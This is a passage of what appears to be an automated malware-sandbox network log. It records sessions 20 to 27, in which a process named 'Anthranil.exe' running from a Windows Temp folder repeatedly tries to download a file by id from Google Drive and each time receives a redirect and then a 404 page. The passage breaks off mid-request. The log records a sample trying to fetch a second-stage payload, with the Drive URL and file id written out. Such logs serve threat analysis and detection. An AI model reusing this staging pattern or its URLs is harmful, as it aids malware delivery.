    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-01-11 04:29:54 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 45 76 4e 6c 78 2d 63 46 52 4b 37 69 6b 52 6a 53 52 65 5a 51 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BEvNlx-cFRK7ikRjSReZQA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49318 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:54 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:55 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:55 GMT
    Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: script-src 'nonce-o4lgZjahBgfMMxT65KBQWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49319 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:55 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:56 UTC | 1851 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFIdbgTtEnrvsYf6N4wH7Tn1wvfpdoYW8SZCyEH0v86h4nPr5AInCNFwyEsq1Ry2hn5-Xv1XFzfZ5TY
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:56 GMT
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-LMZkefaX489A_cu248nRag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-01-11 04:29:56 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 4d 7a 45 79 49 50 4b 65 53 4d 70 73 38 41 61 6f 73 79 4c 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eMzEyIPKeSMps8AaosyLZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49320 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:57 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:57 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:57 GMT
    Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-s-5qwaaiSOLmPOwwe65-fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49321 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:58 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:58 UTC | 1844 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFIdbgRycPxdjWjyfs3Y3imVnVtWE0QqA965Ya9gWByXQywZCJBI0to3FyO8vZqIw2zN2Lsm
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:58 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-86CjWbfPz_SJt_iIsI_2VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
                                                                                  2025-01-11 04:29:58 UTC  1652               IN         Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 42 73 63 4c 68 42 4a 32 54 73 48 4f 72 71 5f 4a 39 71 50 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CBscLhBJ2TsHOrq_J9qPAQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  24          192.168.2.4  49322        216.58.206.46    443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                  2025-01-11 04:29:59 UTC  422                OUT        GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:59 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:59 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-ttwc2lfC310U46vHKdCJ6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  25          192.168.2.4  49323        142.250.185.129  443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                  2025-01-11 04:30:00 UTC  464                OUT        GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:00 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTfaRMVSdz2I_gQteKH19D_xvJ5MwjHJD7p7nXwhrRrotKW5Yzz2cNADz6XOz7nde1O
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:00 GMT
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-XiBI2Keh8MFdGaBmt9OlbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:00 UTC  1652               IN         Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 43 6b 37 69 36 4c 77 76 6f 79 5a 6e 4e 50 71 61 54 74 4d 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TCk7i6LwvoyZnNPqaTtMHw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  26          192.168.2.4  49324        216.58.206.46    443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                  2025-01-11 04:30:01 UTC  422                OUT        GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:02 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:02 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-5U-bZ0hDnUxPkfboarEjSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                  27          192.168.2.4  49325        142.250.185.129  443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                  2025-01-11 04:30:02 UTC  464                OUT        GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
